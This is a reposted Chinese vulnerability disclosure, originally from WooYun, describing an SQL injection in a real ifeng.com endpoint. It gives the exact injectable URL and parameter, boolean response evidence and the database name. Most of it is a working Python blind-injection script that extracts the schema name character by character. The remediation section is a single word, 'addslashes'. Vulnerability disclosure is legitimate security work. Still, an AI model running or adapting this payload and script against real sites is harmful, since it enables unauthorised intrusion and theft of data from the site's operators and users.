神刀安全网

漏洞标题: 凤凰网某处SQL注入

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

。。。

详细说明:

注入点

http://app.art.ifeng.com/?app=system&controller=fall&tag=%25E6%25A3%25AE%25E6%259E%2597*&action=tagspage&jsoncallback=jsonp1460102650253&page=2&_=1460102652833&size=50

注入参数 tag

True

漏洞标题:  凤凰网某处SQL注入

False

漏洞标题:  凤凰网某处SQL注入

漏洞证明:

True返回长度 25 False 62000

数据库cmstop

漏洞标题:  凤凰网某处SQL注入

code 区域
#!/usr/bin/env python
#-*- coding: utf-8 -*-


import time
import string
import binascii
import requests


res = ''
character = "%." + string.digits + "@" + "_" + string.ascii_lowercase

headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36',
'Referer': 'http://app.art.ifeng.com/tags.php?tag=%E6%A3%AE%E6%9E%97',
'Accept': 'text/javascript, application/javascript, */*',
'Connection': 'keep-alive',
}


for i in range(1, 21):
for p in character:
url = "http://app.art.ifeng.com/?app=system&controller=fall&tag=%25E6%25A3%25AE%25E6%259E%2597%27oR(position('{}' in schema())={})and'1'like'1&action=tagspage&jsoncallback=jsonp1460102650253&page=2&_=1460102652833&size=50".format(p, i)
req = requests.get(url, headers=headers)
print req.url + ' --- ',
print len(req.text)
if len(req.text) < 100:
res += p
print "/n[Result]: " + res + "/n"
break

print "/n/n[Finish]: " + res

修复方案:

addslashes

版权声明:转载请注明来源 null_z@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 凤凰网某处SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址